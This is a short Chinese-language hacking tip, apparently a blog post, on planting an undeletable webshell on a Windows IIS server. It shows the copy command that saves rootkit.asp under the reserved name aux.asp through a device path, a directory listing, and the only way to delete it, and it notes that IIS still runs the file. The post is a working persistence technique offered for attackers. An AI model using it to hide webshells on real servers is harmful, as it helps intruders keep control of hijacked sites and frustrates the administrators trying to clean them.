利用系统保留文件名创建无法删除的webshell
Windows 下不能够以下面这些字样来命名文件/文件夹,包括:“aux”,“com1”“com2”“prn”“con”和“nul”等,但是通过cmd下是可以创建此类文件夹的,使用copy命令即可实现:
D:/wwwroot>copy rootkit.asp //./D://wwwroot/aux.asp
已复制 1 个文件。
D:/wwwroot>dir
驱动器 D 中的卷没有标签。
卷的序列号是 4A56-1D29
D:/wwwroot 的目录
2010-04-25 14:41 <DIR> .
2010-04-25 14:41 <DIR> ..
2010-03-08 22:50 42,756 aux.asp
2005-05-02 03:02 9,083 index.asp
2010-03-08 22:50 42,756 rootkit.asp
3 个文件 94,595 字节
2 个目录 3,307,204,608 可用字节
这类文件无法在图形界面删除,如下图所示:
只能在命令行下删除:
D:/wwwroot>del //./D:/wwwroot/aux.asp
D:/wwwroot>
然而在IIS中,这种文件又是可以解析成功的。